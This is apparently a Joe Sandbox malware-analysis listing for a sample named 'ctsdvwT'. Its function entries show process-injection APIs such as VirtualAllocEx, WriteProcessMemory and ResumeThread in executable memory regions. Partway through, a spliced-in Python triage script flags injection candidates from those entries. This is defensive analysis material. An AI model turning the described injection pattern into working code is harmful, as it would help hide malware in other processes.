                                • Instruction Fuzzy Hash: 6C916871D1021A9FEB50CFA8C841BEEBBB2FF48300F1485A9E919E7244DB749985CF91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 252 158ae30-158ae3f 253 158ae6b-158ae6f 252->253 254 158ae41-158ae4e call 1589838 252->254 255 158ae71-158ae7b 253->255 256 158ae83-158aec4 253->256 261 158ae50 254->261 262 158ae64 254->262 255->256 263 158aed1-158aedf 256->263 264 158aec6-158aece 256->264 307 158ae56 call 158b0c8 261->307 308 158ae56 call 158b0b8 261->308 262->253 266 158aee1-158aee6 263->266 267 158af03-158af05 263->267 264->263 265 158ae5c-158ae5e 265->262 268 158afa0-158b060 265->268 270 158aee8-158aeef call 158a814 266->270 271 158aef1 266->271 269 158af08-158af0f 267->269 302 158b068-158b093 GetModuleHandleW 268->302 303 158b062-158b065 268->303 273 158af1c-158af23 269->273 274 158af11-158af19 269->274 272 158aef3-158af01 270->272 271->272 272->269 276 158af30-158af39 call 158a824 273->276 277 158af25-158af2d 273->277 274->273 283 158af3b-158af43 276->283 284 158af46-158af4b 276->284 277->276 283->284 285 158af69-158af6d 284->285 286 158af4d-158af54 284->286 289 158af73-158af76 285->289 286->285 288 158af56-158af66 call 158a834 call 158a844 286->288 288->285 292 158af78-158af96 289->292 293 158af99-158af9f 289->293 292->293 304 158b09c-158b0b0 302->304 305 158b095-158b09b 302->305 303->302 305->304 307->265 308->265
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0158B086
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: a390e6897c98130f74a93070e8685afff54b9b4ac505048f5c0ddb1e15037378
                                • Instruction ID: 8d624f3f5284cd763c27ce507318fc10b47d7e9adab5712a8a53d8cde7dad0da
                                • Opcode Fuzzy Hash: a390e6897c98130f74a93070e8685afff54b9b4ac505048f5c0ddb1e15037378
                                • Instruction Fuzzy Hash: 478137B0A00B068FD724EF6AD44475ABBF1FF88304F10892ED496EBA50D775E846CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 309 158449c-15859d9 CreateActCtxA 312 15859db-15859e1 309->312 313 15859e2-1585a3c 309->313 312->313 320 1585a4b-1585a4f 313->320 321 1585a3e-1585a41 313->321 322 1585a60 320->322 323 1585a51-1585a5d 320->323 321->320 324 1585a61 322->324 323->322 324->324
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 015859C9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 5cffb25e099e8e826ab8146fd63bf950a56a8771be57cbfa1b1a98be51ac766c
                                • Instruction ID: 4331dd95098984fce263a32346cb04f674ac8b7cfde7d348bcc7b77785a7d0fc
                                • Opcode Fuzzy Hash: 5cffb25e099e8e826ab8146fd63bf950a56a8771be57cbfa1b1a98be51ac766c
                                • Instruction Fuzzy Hash: BD41F270C11718CBDB24DFAAC884B9EBBF1BF49304F20806AD408AB251DBB16985CF90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 326 158590c-158590f 327 158591c-15859d9 CreateActCtxA 326->327 329 15859db-15859e1 327->329 330 15859e2-1585a3c 327->330 329->330 337 1585a4b-1585a4f 330->337 338 1585a3e-1585a41 330->338 339 1585a60 337->339 340 1585a51-1585a5d 337->340 338->337 341 1585a61 339->341 340->339 341->341
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 015859C9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: f23009a9cf4a9af4f8d1d47b23ea7e9c7c339122117cc4ab68ffaa4a45b2a4a4
                                • Instruction ID: fb11387b1bc554c69610fde813bc9c4af596c4751373d32dfbe2797d2b5b49e1
                                • Opcode Fuzzy Hash: f23009a9cf4a9af4f8d1d47b23ea7e9c7c339122117cc4ab68ffaa4a45b2a4a4
                                • Instruction Fuzzy Hash: 6F41D1B1C11718CFDB24DFAAC884B9EBBF5BF49304F20816AD418AB251DBB56985CF50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 343 66f6360-66f6364 344 66f62f7-66f6333 343->344 345 66f6366-66f63e3 VirtualAllocEx 343->345 348 66f633d 344->348 349 66f6335-66f633b 344->349 355 66f63ec-66f6411 345->355 356 66f63e5-66f63eb 345->356 350 66f6340-66f6355 348->350 349->350 356->355
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066F63D6
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 7b14384e621b68f25cdece042ac9fdc92f58bdc3278084acd5b5e944653316e0
                                • Instruction ID: 4a69f5f1b2ac3c6c7473e5618ca6af7e68710bd9314b82ff30c509ad070acfc1
                                • Opcode Fuzzy Hash: 7b14384e621b68f25cdece042ac9fdc92f58bdc3278084acd5b5e944653316e0
                                • Instruction Fuzzy Hash: 43313575A002499FDB10DFA9D845BEEFBF5FF48324F248029EA15AB250C775A940CFA0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 360 66f6421-66f6476 362 66f6478-66f6484 360->362 363 66f6486-66f64c5 WriteProcessMemory 360->363 362->363 365 66f64ce-66f64fe 363->365 366 66f64c7-66f64cd 363->366 366->365
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066F64B8
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: fbc772ece19aebe2a1e5963dd9be91d414b73bf5243f150f4c40d7a2ff2a10bf
                                • Instruction ID: 7db904b764dcabccf704398a087dcf8d89fd2b52487faaa5c6ca7a7dbf87c895
                                • Opcode Fuzzy Hash: fbc772ece19aebe2a1e5963dd9be91d414b73bf5243f150f4c40d7a2ff2a10bf
                                • Instruction Fuzzy Hash: 252164B19003499FDB40CFAAC881BEEBBF1FF48310F14842AE918A7240C7789944CBA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 370 66f6428-66f6476 372 66f6478-66f6484 370->372 373 66f6486-66f64c5 WriteProcessMemory 370->373 372->373 375 66f64ce-66f64fe 373->375 376 66f64c7-66f64cd 373->376 376->375
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066F64B8
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 59ce7110e2df26f889241164f4c093e635cd99c3297562491a8bcc35918e43ae
                                • Instruction ID: 8054234716b68878cc4ecd5d144583cf88d6088cdb50c8c2ba47097162f4d54e
                                • Opcode Fuzzy Hash: 59ce7110e2df26f889241164f4c093e635cd99c3297562491a8bcc35918e43ae
                                • Instruction Fuzzy Hash: 342144B19003099FDB40DFAAC880BEEBBF5FF48310F10842AE918A7240C7789944CBA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 380 158d2f8-158d2fe 381 158d300 380->381 382 158d301-158d394 DuplicateHandle 380->382 381->382 383 158d39d-158d3ba 382->383 384 158d396-158d39c 382->384 384->383
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158D387
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: a87e596601658da58efe1dd583a99eff577f04226145477518ec02c92a514ae0
                                • Instruction ID: 2f51136da55dbe9cdec1df7b8fc869b618d3e838aa0caa53586a7076eedcd9b3
                                • Opcode Fuzzy Hash: a87e596601658da58efe1dd583a99eff577f04226145477518ec02c92a514ae0
                                • Instruction Fuzzy Hash: 302105B59002089FDF10CF9AD885AEEBBF5FB48310F14841AE954A7351C374A941CFA5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 387 66f6510-66f65a5 ReadProcessMemory 391 66f65ae-66f65de 387->391 392 66f65a7-66f65ad 387->392 392->391
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066F6598
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 6006355632782ef8a08294aec345b389cdf307874fd63d46cf00aae17b7c9865
                                • Instruction ID: a27dc547d40948bcee7548c47ad71ecdde994eb03ab69faf6d7aace701d6ccd1
                                • Opcode Fuzzy Hash: 6006355632782ef8a08294aec345b389cdf307874fd63d46cf00aae17b7c9865
                                • Instruction Fuzzy Hash: 6D2136B18003599FDB10DFAAC840BEEBBF5FF48314F548429E919A7241C774A940CBA4
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066F5ED6
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: dea5067bb9d3d76fba4cdc32523a45e22d5b5752d2590814a184309665855dc7
                                • Instruction ID: fadbb66f7e1f2cc3cda7cb1f4c128eb0b970367649cc1c68c7c7a5db398d4d6e
                                • Opcode Fuzzy Hash: dea5067bb9d3d76fba4cdc32523a45e22d5b5752d2590814a184309665855dc7
                                • Instruction Fuzzy Hash: 54213471D003089FDB50DFAAC4857AEBBF4EB88310F54842AD559A7241CB789944CFA4
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066F6598
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 203dae8ff0b641f2b935e2f4e9aab2445bedf71217b80639401eaf9e471e18b9
                                • Instruction ID: dba4d9cbecdf04229acedc2645fa6476a05d8bb658e5450577697f01e17855db
                                • Opcode Fuzzy Hash: 203dae8ff0b641f2b935e2f4e9aab2445bedf71217b80639401eaf9e471e18b9
                                • Instruction Fuzzy Hash: 292125B18003499FDF10DFAAC880BEEBBF5FF48310F54842AE958A7241C7789940CBA4
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158D387
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 028c5946abbd4ec1bb9824b9aea952845bb969b1ccd07ce26e9cbad64b8825fa
                                • Instruction ID: ed752adf9077ab8734f13bc6c3ae3e2fa31ef5cb5d7611c5b854007576c9270d
                                • Opcode Fuzzy Hash: 028c5946abbd4ec1bb9824b9aea952845bb969b1ccd07ce26e9cbad64b8825fa
                                • Instruction Fuzzy Hash: 3A21C4B59002489FDB10CF9AD484ADEBBF5FB48310F14842AE958A7351D374A954CFA5
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0158B101,00000800,00000000,00000000), ref: 0158B312
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: d18e0e89ad16374ca88dbec2d7d5ab8fbb5429d4422f96da79096f2b9561bc38
                                • Instruction ID: 56f37b45d9e86f2140246ebed4691113f63b75dd779ea8585133fa7b5cba0980
                                • Opcode Fuzzy Hash: d18e0e89ad16374ca88dbec2d7d5ab8fbb5429d4422f96da79096f2b9561bc38
                                • Instruction Fuzzy Hash: 4F1100B69003498FDB10DF9AD444AAEFBF8FB88310F14842AE919BB201C375A545CFA4
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0158B101,00000800,00000000,00000000), ref: 0158B312
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 3554ea6a2042da4ebf723cbf2e2adf7b24cb123cf0bf3d3a6c639bf526389707
                                • Instruction ID: 77e890da60fda92adf86f401316e3c95712d367e7eb6059f29b67a893c2d80a9
                                • Opcode Fuzzy Hash: 3554ea6a2042da4ebf723cbf2e2adf7b24cb123cf0bf3d3a6c639bf526389707
                                • Instruction Fuzzy Hash: 3D1114B68003498FDB10DFAAC444ADEFBF4FB88310F14842AE959B7211C375A545CFA5
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066F63D6
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 9ae9bd63273d53eb7df5267bd2f3bebd16c2046cbdd84cffb7f0eb115d8a6d7a
                                • Instruction ID: 707e9266bfcb1f30bfccb9c30902624e88ee07f2f62f3e868fa4964fa0722038
                                • Opcode Fuzzy Hash: 9ae9bd63273d53eb7df5267bd2f3bebd16c2046cbdd84cffb7f0eb115d8a6d7a
                                • Instruction Fuzzy Hash: 771137768003489FDF10DFAAC844BEEBBF5EF88310F148429E555A7250C775A944CFA4
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 5a859af894d395c54e1c288da24a339f6a1a71255e1b8daab154f8a452312910
                                • Instruction ID: a559f584e73f92b20fa9cb28dc97c3061556929e2e19b3039d383cc205a3f3bd
                                • Opcode Fuzzy Hash: 5a859af894d395c54e1c288da24a339f6a1a71255e1b8daab154f8a452312910
                                • Instruction Fuzzy Hash: 2C1146B59003488FDB10DFAAC4457EEFBF5AF88314F24842AD559A7250C7755944CBA4
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 5c2a5224426f8284f795f73845fe3431c27199e49842a31c23dfa0ba3e7a5d63
                                • Instruction ID: 4829a5f3aaab6db090b8ef1a3939d14928adf9b819d2ba8d9e73fef1f273aab2
                                • Opcode Fuzzy Hash: 5c2a5224426f8284f795f73845fe3431c27199e49842a31c23dfa0ba3e7a5d63
                                • Instruction Fuzzy Hash: 751136B1D003488FDB10DFAAC4457EEFBF5EF88324F24842AD559A7240CB75A944CBA4
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0158B086
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: f787eeb5689d483f94cb8404162207de37e31f42c4920a9499906ffdcee9f834
                                • Instruction ID: 24146be40a3c7b3fc6f06eb6bf52845155e2043b61e56d89c814af8ca07ed7a7
                                • Opcode Fuzzy Hash: f787eeb5689d483f94cb8404162207de37e31f42c4920a9499906ffdcee9f834
                                • Instruction Fuzzy Hash: A411FDB5C00749CFDB20DF9AC444B9EFBF8AB89210F10842AD968B7210C375A549CFA5
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 066F90DD
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 008623f275995a53b4cf65700bdf6a1042c4a6660cc18a7914a1f464ecf71648
                                • Instruction ID: 83c961d1f84571561307c5df0ea57f062c2a3bfc0fe2adaa8b3c0687dd5b9324
                                • Opcode Fuzzy Hash: 008623f275995a53b4cf65700bdf6a1042c4a6660cc18a7914a1f464ecf71648
                                • Instruction Fuzzy Hash: B81133B58007499FDB20DF9AC885BDEFBF8EB48324F20851AE558B7240C375A544CFA0
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 066F90DD
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: cebc80277eca77946bb41770bbaf267049d426b5a7810a6304ac1784ed9d3b95
                                • Instruction ID: d38171478fa05289625d447a103acc78c64e60b1f294c61933745df2ceb6604b
                                • Opcode Fuzzy Hash: cebc80277eca77946bb41770bbaf267049d426b5a7810a6304ac1784ed9d3b95
                                • Instruction Fuzzy Hash: 1D11D3B58003499FDB50DF9AD885BDEFBF8EB48324F10841AE558A7240C375A944CFA5
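The entries above are the raw output of the Joe Sandbox IDA plugin: one block per recovered function, with the API calls it makes, the memory dump it was carved from, and its opcode and instruction identifiers. Reading them by hand is slow; what a triager wants is the set of APIs per unbacked region and which functions recur. The following Python is an added example written for this page, not code from Joe Sandbox or from the analysed sample. It parses a constructed excerpt in the listing's own layout (four entries copied from this report, indentation removed), groups them by dump file, flags regions that are not PE-backed, are mapped PAGE_EXECUTE_READWRITE and combine two or more process-injection APIs, and lists Opcode IDs shared by more than one function. The injection indicator set, and the reading of the fifth dotted field of the `.sdmp` name as the page protection, are the example's own assumptions; the fourth field matching `Offset:` is visible on the page, and the `API ID` token is used because the ResumeThread entries carry no explicit call line.

```python
import re
from collections import defaultdict

PAGE_EXECUTE_READWRITE = 0x40  # Windows memory-protection constant

# Indicator set chosen for this example (not something the report defines): an
# unbacked RWX region that both allocates in a foreign process and resumes a
# thread is the usual staging pattern for PE injection.
INJECTION_APIS = {"VirtualAllocEx", "WriteProcessMemory", "ResumeThread",
                  "CreateRemoteThread", "SetThreadContext"}

# Constructed sample: four entries copied from the report listing (066F0000
# region twice, 011DD000 region twice) with the leading indentation removed.
SAMPLE = """\
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066F63D6
Memory Dump Source
• Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 9ae9bd63273d53eb7df5267bd2f3bebd16c2046cbdd84cffb7f0eb115d8a6d7a
• Instruction ID: 707e9266bfcb1f30bfccb9c30902624e88ee07f2f62f3e868fa4964fa0722038
• Opcode Fuzzy Hash: 9ae9bd63273d53eb7df5267bd2f3bebd16c2046cbdd84cffb7f0eb115d8a6d7a
• Instruction Fuzzy Hash: 771137768003489FDF10DFAAC844BEEBBF5EF88310F148429E555A7250C775A944CFA4
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 5a859af894d395c54e1c288da24a339f6a1a71255e1b8daab154f8a452312910
• Instruction ID: a559f584e73f92b20fa9cb28dc97c3061556929e2e19b3039d383cc205a3f3bd
• Opcode Fuzzy Hash: 5a859af894d395c54e1c288da24a339f6a1a71255e1b8daab154f8a452312910
• Instruction Fuzzy Hash: 2C1146B59003488FDB10DFAAC4457EEFBF5AF88314F24842AD559A7250C7755944CBA4
Memory Dump Source
• Source File: 0000000A.00000002.1483979732.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11dd000_ctsdvwT.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
• Instruction ID: 41050bd593ec72aa37f9940ce7e02a657212c4acf1bda98d9983e3bc71f36293
• Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
• Instruction Fuzzy Hash: AD11CD72404240DFCF16CF44D5C4B56BF61FB84324F2482A9D8090A657C33AE45ACBA2
Memory Dump Source
• Source File: 0000000A.00000002.1483979732.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11dd000_ctsdvwT.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
• Instruction ID: 2fce78b49231a5a872f88c3ce5036a8c2699f6d8275f45d38ec1add38526582f
• Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
• Instruction Fuzzy Hash: 4E119D76504280DFCF16CF54E5C4B16BF71FB84318F2486A9D8490B656C33AD45ACBA2
"""

CALL_RE = re.compile(r"^• (\w+)\.([A-Z0-9]+)\(.*\), ref: ([0-9A-F]+)$")
FIELD_RE = re.compile(r"^• ([A-Za-z ]+?): ?(.*)$")
SRC_RE = re.compile(r"^(\S+\.sdmp), Offset: ([0-9A-F]+), based on PE: (true|false)$")


def parse_entries(text):
    """One dict per function entry; an entry ends at its 'Instruction Fuzzy Hash' line."""
    entries, cur = [], {"calls": []}
    for raw in text.splitlines():
        line = raw.strip()  # the report indents every line
        m = CALL_RE.match(line)
        if m:  # e.g. '• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066F63D6'
            cur["calls"].append({"api": m[1], "module": m[2], "ref": m[3]})
            continue
        m = FIELD_RE.match(line)
        if not m:  # 'APIs', 'Memory Dump Source', 'Similarity' headers
            continue
        key, value = m[1], m[2]
        if key == "Source File":
            s = SRC_RE.match(value)
            cur["source"], cur["offset"], cur["pe_backed"] = s[1], s[2], s[3] == "true"
            # Assumption about the .sdmp name layout: field 4 is the base (it
            # equals Offset on the same line) and field 5 is the page protection.
            cur["protect"] = int(s[1].split(".")[4], 16)
        else:
            cur[key] = value
        if key == "Instruction Fuzzy Hash":
            entries.append(cur)
            cur = {"calls": []}
    return entries


def regions(entries):
    """Group entries by dump file, merging API names from the call lines and from
    the Similarity 'API ID' (filled in even when the call line is absent)."""
    out = {}
    for e in entries:
        r = out.setdefault(e["source"], {"offset": e["offset"], "pe_backed": e["pe_backed"],
                                         "protect": e["protect"], "apis": set()})
        r["apis"].update(c["api"] for c in e["calls"])
        if e.get("API ID"):
            r["apis"].add(e["API ID"])
    return out


def injection_candidates(entries):
    """Offsets of unbacked RWX regions whose API set hits two or more injection APIs."""
    hits = []
    for r in regions(entries).values():
        matched = r["apis"] & INJECTION_APIS
        if not r["pe_backed"] and r["protect"] == PAGE_EXECUTE_READWRITE and len(matched) >= 2:
            hits.append((r["offset"], sorted(matched)))
    return sorted(hits)


def shared_opcode_ids(entries):
    """Opcode IDs seen more than once: same code shape, different instruction bytes."""
    seen = defaultdict(list)
    for e in entries:
        seen[e["Opcode ID"]].append(e["Instruction ID"])
    return {k: v for k, v in seen.items() if len(v) > 1}


if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    print(f"{len(ents)} entries across {len(regions(ents))} dump regions")
    print("injection candidates:", injection_candidates(ents))
    print("shared opcode IDs:", shared_opcode_ids(ents))
```

Run against the full exported listing (pasted into `SAMPLE` or read from a file), the same three functions give the per-region API inventory for every process in the report; the `protect` check is what separates a legitimately loaded module from a region the sample allocated itself, and the repeated Opcode ID in the 011DD000 dump is the kind of duplicate worth diffing before deciding which copy to reverse first.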
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: P
                                • API String ID: 0-3110715001
                                • Opcode ID: 0ef0385c0160e37f0206596fc5fac78885f1e897120a6c77f617a508704c8fc9
                                • Instruction ID: 858ebc0080215f05b26a2858778b4aa92e7d55e786bd05c92cb039039f9b44b1
                                • Opcode Fuzzy Hash: 0ef0385c0160e37f0206596fc5fac78885f1e897120a6c77f617a508704c8fc9
                                • Instruction Fuzzy Hash: 4241D171A04215CFDF14CFE8E845A7EBBF2FB85211F14416AF662EB291CB308845DB59
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: C_fm^
                                • API String ID: 0-3546035360
                                • Opcode ID: 5480a7eb81c6071d7b1567324442d52d1bdde6a65d7cf4705776eea11e72bfed
                                • Instruction ID: e94eda73823c749bd36e2668722d92593eae152c629c674a6f29a56038d55e8f
                                • Opcode Fuzzy Hash: 5480a7eb81c6071d7b1567324442d52d1bdde6a65d7cf4705776eea11e72bfed
                                • Instruction Fuzzy Hash: 6B21D3726002018FCB14EBB8C4889DFBBE6FF84214B558969E60ADB350EF71E8058B91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d0df1192519807b53f02657049519ccfaf027129fe7af5da912b460d2e8016d
